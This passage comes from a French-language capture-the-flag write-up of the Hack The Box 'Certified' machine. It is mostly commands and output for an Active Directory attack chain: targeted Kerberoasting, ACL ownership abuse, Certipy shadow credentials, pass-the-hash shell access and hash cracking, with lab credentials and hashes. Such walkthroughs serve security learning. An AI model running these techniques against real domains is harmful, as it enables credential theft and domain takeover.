class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">sudo bloodhound-python -d CERTIFIED.HTB -u <span class="s1">&#39;judith.mader&#39;</span> -p <span class="s1">&#39;judith09&#39;</span> -dc certified.htb -c All --zip -ns 10.10.11.41 </span></span><span class="line"><span class="cl">INFO: Found AD domain: certified.htb </span></span><span class="line"><span class="cl">INFO: Getting TGT <span class="k">for</span> user </span></span><span class="line"><span class="cl">WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW<span class="o">(</span>Clock skew too great<span class="o">)</span> </span></span><span class="line"><span class="cl">INFO: Connecting to LDAP server: certified.htb </span></span><span class="line"><span class="cl">INFO: Found <span class="m">1</span> domains </span></span><span class="line"><span class="cl">INFO: Found <span class="m">1</span> domains in the forest </span></span><span class="line"><span class="cl">INFO: Found <span class="m">2</span> computers </span></span><span class="line"><span class="cl">INFO: Connecting to LDAP server: certified.htb </span></span><span class="line"><span class="cl">INFO: Found <span class="m">10</span> users </span></span><span class="line"><span class="cl">INFO: Found <span class="m">53</span> groups </span></span><span class="line"><span class="cl">INFO: Found <span class="m">2</span> gpos </span></span><span class="line"><span class="cl">INFO: Found <span class="m">1</span> ous </span></span><span class="line"><span class="cl">INFO: Found <span class="m">19</span> containers </span></span><span class="line"><span class="cl">INFO: Found <span class="m">0</span> trusts </span></span><span class="line"><span class="cl">INFO: Starting computer enumeration with <span class="m">10</span> workers </span></span><span class="line"><span class="cl">INFO: Querying computer: </span></span><span class="line"><span class="cl">INFO: Querying computer: DC01.certified.htb </span></span><span class="line"><span class="cl">INFO: Done in 00M 07S </span></span><span class="line"><span class="cl">INFO: Compressing output into 20241208115439_bloodhound.zip </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="targeted-kerberoasting">Targeted Kerberoasting </h3><p>D&rsquo;après ce qu&rsquo;on observe sur bloodhound, on peut voir que l&rsquo;utilisateur <code>management_svc</code> peut potentiellement être récupéré à l&rsquo;aide d&rsquo;une attaque &ldquo;targeted Kerberoasting&rdquo;. A l&rsquo;aide de l&rsquo;outil <code>targetedKerberoast.py</code>, on effectue l&rsquo;attaque et on récupére le hash du mot de passe de <code>management_svc</code> :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">targetedKerberoast.py -d certified.htb -u judith.mader -p judith09 -v </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Starting kerberoast attacks </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Fetching usernames from Active Directory with LDAP </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Printing <span class="nb">hash</span> <span class="k">for</span> <span class="o">(</span>management_svc<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="nv">$krb5tgs$23$*</span>management_svc<span class="nv">$CERTIFIED</span>.HTB<span class="nv">$certified</span>.htb/management_svc*<span class="nv">$98</span>e6a7443e6760f44cdd6b7a9ff0cdc8<span class="nv">$21</span>d6889b72b0eae33c5f4eb81af29e699b45b48284cde10ae2fdc23a1c929a5f5ccb8c88ef7c9a6f14552b848d42791d0c4f0827621e3fbd06abfb0fe5d41b2754443a76c8abe11350c929d8b6251f927222c0f1c7339620a15866b2f3714d5ab15cdb2893b13daf6db594aa4259d89028198d886c697997cc443afe9f8a09361736573565ebfa264a03c5d00ffb2377898d0c6087385d3b895ecb7e5ae11ac37875409b1bb574350707d049e5aad147b5a36c1172ea4d4deb2f7c62e5bfb75edcbb475e59a34ee8255b9262b39449625a05185526829e7437e9078253741d3bcb130325ad4e07ca41a2436a29020d467f67e4ff16e5be22a04b30317be8dc773f11374aabea10e4e669146698d0c558a060e27ac55554121cc26d7050172044810850793699c631a46cb33af8650b940c3b7676bd397c47cd7b27dd62f15d2b4fe8ca2c741bad98335af2be77ec06317d2ca3e5fb32bad8c3cc599cc2f62fc5a3e1124501ca010fe529d00e87babcaadbb8fb331d9027c999c9d30ad828613f25e782acc721d3842db14020713fcddded15996c195da468a14aa2cf2595f94c305d68d25d91579ec569e226627f15b0b7c5df2fd4306a8b5425e553711f321f3f40d0e9d65bcf77d20db59fea66a66b01ff383af30e7541ace8c20266199fd9ea56a54a5aade2859bd463b386eb754a8eb2c7202b3575adc3e1d8fb9231d93fab04039d4a7f07a9b79ffe00fa9c5c786404c68742e822a84af136cd472f6168621dfa4817312bdc08eb5e070a69842b15bbbea8a503f101043e1981cda2e0df4008c52d41b0e2805d8616c08b025eea8fc230b1b983322be2060f18da2ee9d832769ef53dcbd6d27bed287c55ed73be5678e21f52c4d3703a90d65a340e573648f43bf60a8194975516d2e70b69522f24d4aa713a20ba0d84efa776eb7886113456c77cb1cb535cb741ff651caf111ecec2f8d63a37d544035e2acf72298024415ee49f00037ee3e0a5653643a48675d355c7fd911f728fa3b9933c14919828bc74e689c523c7602a03413105f8c8aee518c6458ad4f2fcdcc8859ebca960a39b37987c7ac6a8d3f0bb8ca06b82f7e3afc3bb0d9777e852fb0a6ccdaf9a7897632d5c1ff7a7524f1ccd06da51b1ffeaeeca9b1b9ef827b7ec9de56af9af28093990983c4bc1543229c1b886b802286d606aca8fd2f1decc07b25f241fdd287975d6db4d32e472ae89700764a5e5a5cefb977ac106431fa8f435bf2c420a00528aaaa9237a286ff433be4ce8eb458cdcab450003ee0c5d49ce6c069cc40c48ed721c3a07b42e470991321b322475f9aef94c3e488b62289793fb3dac6c56cad4ebb95189c8864d2b7425047f5e4fd8f71d029f6e7df1caea05089da8a024bca18c34d92c52cb5d2bc19a4578ec9e872285fccabbdf54cff68968cff90ac592f247928bd27fcbb89b45a75ae00351ca654b9a978c213e52bbca509eeb5c34c520f94c5d394b2dee91988bddb8d7a6e1f61732d961c42ad33b76b46122f2e4a55dce6abf450d64180b6ff2394a59418668bf79f6d34af701fd1e98 </span></span></code></pre></td></tr></table> </div> </div><h3 id="shadow-credential-attack">Shadow credential attack </h3><ul> <li>Grant ownership : It has the following command-line arguments.This abuse can be carried out when controlling an object that has WriteOwner or GenericAll over any object. The attacker can update the owner of the target object. Once the object owner has been changed to a principal the attacker controls, the attacker may manipulate the object any way they see fit. On va donc rendre judith.mader owner du groupe</li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">python3 owneredit.py -new-owner <span class="s1">&#39;judith.mader&#39;</span> -target <span class="s1">&#39;management&#39;</span> -dc-ip 10.10.11.41 -action write <span class="s1">&#39;certified.htb&#39;</span>/<span class="s1">&#39;judith.mader&#39;</span>:<span class="s1">&#39;judith09&#39;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Current owner information below </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> - SID: S-1-5-21-729746778-2675978091-3820388244-512 </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> - sAMAccountName: Domain Admins </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> - distinguishedName: <span class="nv">CN</span><span class="o">=</span>Domain Admins,CN<span class="o">=</span>Users,DC<span class="o">=</span>certified,DC<span class="o">=</span>htb </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> OwnerSid modified successfully! </span></span></code></pre></td></tr></table> </div> </div><p>Puis :</p> <ul> <li>Modifying the rights To abuse ownership of a group object, you may grant yourself the AddMember privilege.</li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">dacledit.py -action <span class="s1">&#39;write&#39;</span> -rights <span class="s1">&#39;WriteMembers&#39;</span> -principal <span class="s1">&#39;judith.mader&#39;</span> -target <span class="s1">&#39;management&#39;</span> <span class="s1">&#39;certified.htb&#39;</span>/<span class="s1">&#39;judith.mader&#39;</span>:<span class="s1">&#39;judith09&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> DACL backed up to dacledit-20241209-130331.bak </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> DACL modified successfully! </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## Cependant, après verification ca n&#39;a pas fonctionné. Par contre j&#39;ai pu me donner le controle totale a l&#39;aide de cette commande</span> </span></span><span class="line"><span class="cl">dacledit.py -action <span class="s1">&#39;write&#39;</span> -rights <span class="s1">&#39;FullControl&#39;</span> -principal <span class="s1">&#39;judith.mader&#39;</span> -target <span class="s1">&#39;management&#39;</span> <span class="s1">&#39;certified.htb&#39;</span>/<span class="s1">&#39;judith.mader&#39;</span>:<span class="s1">&#39;judith09&#39;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## Pour vérifier les droits des utilisateur sur un groupe/objet, on peut utiliser cette commande</span> </span></span><span class="line"><span class="cl">dacledit.py -action <span class="s1">&#39;read&#39;</span> -target <span class="s1">&#39;management&#39;</span> <span class="s1">&#39;certified.htb&#39;</span>/<span class="s1">&#39;judith.mader&#39;</span>:<span class="s1">&#39;judith09&#39;</span> <span class="p">|</span> grep judith -A <span class="m">3</span> -B <span class="m">3</span> </span></span></code></pre></td></tr></table> </div> </div><p>Enfin :</p> <ul> <li>Adding to the group You can now add members to the group. On va donc s&rsquo;ajouter comme membre du groupe : judith.mader.</li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">net rpc group addmem <span class="s2">&#34;management&#34;</span> <span class="s2">&#34;judith.mader&#34;</span> -U <span class="s2">&#34;certified.htb&#34;</span>/<span class="s2">&#34;judith.mader&#34;</span>%<span class="s2">&#34;judith09&#34;</span> -S <span class="s2">&#34;certified.htb&#34;</span> </span></span></code></pre></td></tr></table> </div> </div><p>Maintenant que judith.mader est membre du groupe, on va enfin pouvoir faire une &lsquo;shadow credential attack&rsquo; pour obtenir le hash NT de <code>management_svc</code> :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">certipy-ad shadow auto -username judith.mader@certified.htb -p judith09 -dc-ip 10.10.11.41 -account management_svc -debug </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Authenticating to LDAP server </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Bound to ldaps://10.10.11.41:636 - ssl </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Default path: <span class="nv">DC</span><span class="o">=</span>certified,DC<span class="o">=</span>htb </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Configuration path: <span class="nv">CN</span><span class="o">=</span>Configuration,DC<span class="o">=</span>certified,DC<span class="o">=</span>htb </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Targeting user <span class="s1">&#39;management_svc&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Generating certificate </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Certificate generated </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Generating Key Credential </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Key Credential generated with DeviceID <span class="s1">&#39;8438746f-c951-b3d9-9be0-c455cedf6731&#39;</span> </span></span><span class="line"><span class="cl">&lt;KeyCredential structure at 0x7f711d6a6900&gt; </span></span><span class="line"><span class="cl"> <span class="p">|</span> Owner: <span class="nv">CN</span><span class="o">=</span>management service,CN<span class="o">=</span>Users,DC<span class="o">=</span>certified,DC<span class="o">=</span>htb </span></span><span class="line"><span class="cl"> <span class="p">|</span> Version: 0x200 </span></span><span class="line"><span class="cl"> <span class="p">|</span> KeyID: KcbU1P0bMaVuWjpricPI4cNFK5+qjRkV4gYbM4DfPP0<span class="o">=</span> </span></span><span class="line"><span class="cl"> <span class="p">|</span> KeyHash: 64a54a908329ffbd4746b1dabf32b65a35a9a107e4851235de8948687e0cf69d </span></span><span class="line"><span class="cl"> <span class="p">|</span> RawKeyMaterial: &lt;dsinternals.common.cryptography.RSAKeyMaterial.RSAKeyMaterial object at 0x7f711d6a68a0&gt; </span></span><span class="line"><span class="cl"> <span class="p">|</span> <span class="p">|</span> Exponent <span class="o">(</span>E<span class="o">)</span>: <span class="m">65537</span> </span></span><span class="line"><span class="cl"> <span class="p">|</span> <span class="p">|</span> Modulus <span class="o">(</span>N<span class="o">)</span>: 0x920669e7366de61569081a4de24445dc45e6856c747d69ce86cd15dadcf516effc4c3543cb7e96487a3b5390c05b76ef5f1d1c0f2266803ffec550d281a108c2f594d21f4ce33abb612532f88560b6627b7dbe21247ec565e51d7b07b3bcfcbc858c91defaf7ee39e6ee7725d9df0ba759fbabc0ebea062c2c4adc03e6bb2459a7e285ed37eefeaaa91a0fd2de40114879e3d7b286646dfd0d6448a83b900eb7acc4b75345b61eefe66688de7a1425706c889a9e978ffcf2eb4456646c410454680341338a19214f690ffad5258b39cdbf000cbdbd0620d233aab9a431845148283d6fb6b5ae0c784a00938d72e00a254929a0fce6c922422d17abe8f57e8e69 </span></span><span class="line"><span class="cl"> <span class="p">|</span> <span class="p">|</span> Prime1 <span class="o">(</span>P<span class="o">)</span>: 0x0 </span></span><span class="line"><span class="cl"> <span class="p">|</span> <span class="p">|</span> Prime2 <span class="o">(</span>Q<span class="o">)</span>: 0x0 </span></span><span class="line"><span class="cl"> <span class="p">|</span> Usage: KeyUsage.NGC </span></span><span class="line"><span class="cl"> <span class="p">|</span> LegacyUsage: None </span></span><span class="line"><span class="cl"> <span class="p">|</span> Source: KeySource.AD </span></span><span class="line"><span class="cl"> <span class="p">|</span> DeviceId: 8438746f-c951-b3d9-9be0-c455cedf6731 </span></span><span class="line"><span class="cl"> <span class="p">|</span> CustomKeyInfo: &lt;CustomKeyInformation at 0x7f711d6968f0&gt; </span></span><span class="line"><span class="cl"> <span class="p">|</span> <span class="p">|</span> Version: <span class="m">1</span> </span></span><span class="line"><span class="cl"> <span class="p">|</span> <span class="p">|</span> Flags: KeyFlags.NONE </span></span><span class="line"><span class="cl"> <span class="p">|</span> <span class="p">|</span> VolumeType: None </span></span><span class="line"><span class="cl"> <span class="p">|</span> <span class="p">|</span> SupportsNotification: None </span></span><span class="line"><span class="cl"> <span class="p">|</span> <span class="p">|</span> FekKeyVersion: None </span></span><span class="line"><span class="cl"> <span class="p">|</span> <span class="p">|</span> Strength: None </span></span><span class="line"><span class="cl"> <span class="p">|</span> <span class="p">|</span> Reserved: None </span></span><span class="line"><span class="cl"> <span class="p">|</span> <span class="p">|</span> EncodedExtendedCKI: None </span></span><span class="line"><span class="cl"> <span class="p">|</span> LastLogonTime <span class="o">(</span>UTC<span class="o">)</span>: 2024-12-10 04:23:52.735565 </span></span><span class="line"><span class="cl"> <span class="p">|</span> CreationTime <span class="o">(</span>UTC<span class="o">)</span>: 2024-12-10 04:23:52.735565 </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Key Credential: B:828:0002000020000129c6d4d4fd1b31a56e5a3a6b89c3c8e1c3452b9faa8d1915e2061b3380df3cfd20000264a54a908329ffbd4746b1dabf32b65a35a9a107e4851235de8948687e0cf69d1b0103525341310008000003000000000100000000000000000000010001920669e7366de61569081a4de24445dc45e6856c747d69ce86cd15dadcf516effc4c3543cb7e96487a3b5390c05b76ef5f1d1c0f2266803ffec550d281a108c2f594d21f4ce33abb612532f88560b6627b7dbe21247ec565e51d7b07b3bcfcbc858c91defaf7ee39e6ee7725d9df0ba759fbabc0ebea062c2c4adc03e6bb2459a7e285ed37eefeaaa91a0fd2de40114879e3d7b286646dfd0d6448a83b900eb7acc4b75345b61eefe66688de7a1425706c889a9e978ffcf2eb4456646c410454680341338a19214f690ffad5258b39cdbf000cbdbd0620d233aab9a431845148283d6fb6b5ae0c784a00938d72e00a254929a0fce6c922422d17abe8f57e8e6901000401010005001000066f74388451c9d9b39be0c455cedf67310200070100080008fb78af51bb4adb01080009fb78af51bb4adb01:CN<span class="o">=</span>management service,CN<span class="o">=</span>Users,DC<span class="o">=</span>certified,DC<span class="o">=</span>htb </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Adding Key Credential with device ID <span class="s1">&#39;8438746f-c951-b3d9-9be0-c455cedf6731&#39;</span> to the Key Credentials <span class="k">for</span> <span class="s1">&#39;management_svc&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Successfully added Key Credential with device ID <span class="s1">&#39;8438746f-c951-b3d9-9be0-c455cedf6731&#39;</span> to the Key Credentials <span class="k">for</span> <span class="s1">&#39;management_svc&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Authenticating as <span class="s1">&#39;management_svc&#39;</span> with the certificate </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Using principal: management_svc@certified.htb </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying to get TGT... </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Got TGT </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Saved credential cache to <span class="s1">&#39;management_svc.ccache&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying to retrieve NT <span class="nb">hash</span> <span class="k">for</span> <span class="s1">&#39;management_svc&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Restoring the old Key Credentials <span class="k">for</span> <span class="s1">&#39;management_svc&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Successfully restored the old Key Credentials <span class="k">for</span> <span class="s1">&#39;management_svc&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> NT <span class="nb">hash</span> <span class="k">for</span> <span class="s1">&#39;management_svc&#39;</span>: a091c1832bcdd4677c28b5a6a1295584 </span></span></code></pre></td></tr></table> </div> </div><p>On obtient le hachage NT pour l&rsquo;utilisateur management_svc !</p> <h3 id="winrm-connexion-avec-le-hachage-nt-pass-the-hash---user-flag">WinRm connexion avec le hachage NT (Pass-The-Hash) - user flag </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">evil-winrm -i 10.10.11.41 -u management_svc -H a091c1832bcdd4677c28b5a6a1295584 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Evil-WinRM shell v3.7 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc<span class="o">()</span> <span class="k">function</span> is unimplemented on this machine </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Info: Establishing connection to remote endpoint </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\m</span>anagement_svc<span class="se">\D</span>ocuments&gt; <span class="nb">cd</span> ../Desktop </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\m</span>anagement_svc<span class="se">\D</span>esktop&gt; cat user.txt </span></span><span class="line"><span class="cl">423f.....d084 </span></span></code></pre></td></tr></table> </div> </div><h3 id="shadow-credentials-attack--management_svc---ca_operator">Shadow Credentials attack : management_svc -&gt; ca_operator </h3><p>On effectue à nouveau une shadow credential attack pour récupérer le hachage NT de l&rsquo;utilisateur <code>ca_operator</code>. Pour cela on utilise l&rsquo;utilisateur management_svc avec son hachage NT (option <code>-hashes</code> au lieu du mot de passe qu&rsquo;on ne connait <code>-p</code>) :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">certipy-ad shadow auto -username management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584 -dc-ip 10.10.11.41 -account ca_operator -debug </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Authenticating to LDAP server </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Bound to ldaps://10.10.11.41:636 - ssl </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Default path: <span class="nv">DC</span><span class="o">=</span>certified,DC<span class="o">=</span>htb </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Configuration path: <span class="nv">CN</span><span class="o">=</span>Configuration,DC<span class="o">=</span>certified,DC<span class="o">=</span>htb </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Targeting user <span class="s1">&#39;ca_operator&#39;</span> </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Successfully restored the old Key Credentials <span class="k">for</span> <span class="s1">&#39;ca_operator&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> NT <span class="nb">hash</span> <span class="k">for</span> <span class="s1">&#39;ca_operator&#39;</span>: 13b29964cc2480b4ef454c59562e675c </span></span></code></pre></td></tr></table> </div> </div><p>### Nouveau bloodhound avec l&rsquo;utilisateur ca_operator</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">sudo bloodhound-python -d CERTIFIED.HTB -u <span class="s1">&#39;ca_operator&#39;</span> -p <span class="s1">&#39;P@ssword&#39;</span> -dc certified.htb -c All --zip -ns 10.10.11.41 </span></span></code></pre></td></tr></table> </div> </div><h3 id="bruteforce-hashcat-du-hachage-nt">Bruteforce hashcat du hachage NT </h3><p>On obtient le mot de passe de l&rsquo;utilisateur <code>ca_operator</code> grâce à hashcat et la wordlist <code>rockyou.txt</code> :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">hashcat -m <span class="m">1000</span> -a <span class="m">0</span> hash.txt ~/wordlists/rockyou.txt --show </span></span><span class="line"><span class="cl">13b29964cc2480b4ef454c59562e675c:P@ssword </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="bloodhound-pe-path">Bloodhound PE Path </h3><p><img src="https://leopoldabgn.github.io/writeups/p/certified-htb/AD1.png" width="884" height="646" srcset="https://leopoldabgn.github.io/writeups/p/certified-htb/AD1_hu_b419142d57acff50.png 480w, https://leopoldabgn.github.io/writeups/p/certified-htb/AD1_hu_3d86e4be04c7c92a.png 1024w" loading="lazy" alt="AD" class="gallery-image" data-flex-grow="136" data-flex-basis="328px" ></p> <h3 id="checking-vuln-in-certificates--templates-with-ca_operator">Checking vuln in certificates / templates with ca_operator </h3><p>On observe que management_svc à le droit CanPSRemote sur la machine DC01 :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span><span class="lnt">69 </span><span class="lnt">70 </span><span class="lnt">71 </span><span class="lnt">72 </span><span class="lnt">73 </span><span class="lnt">74 </span><span class="lnt">75 </span><span class="lnt">76 </span><span class="lnt">77 </span><span class="lnt">78 </span><span class="lnt">79 </span><span class="lnt">80 </span><span class="lnt">81 </span><span class="lnt">82 </span><span class="lnt">83 </span><span class="lnt">84 </span><span class="lnt">85 </span><span class="lnt">86 </span><span class="lnt">87 </span><span class="lnt">88 </span><span class="lnt">89 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">certipy-ad find -vulnerable -stdout -u ca_operator@certified.htb -hashes 94994b74f29662fc4d702f2f3b0df327:94994b74f29662fc4d702f2f3b0df327 -debug </span></span><span class="line"><span class="cl">Certipy v4.8.2 - by Oliver Lyak <span class="o">(</span>ly4k<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Trying to resolve <span class="s1">&#39;CERTIFIED.HTB&#39;</span> at <span class="s1">&#39;10.0.2.3&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Resolved <span 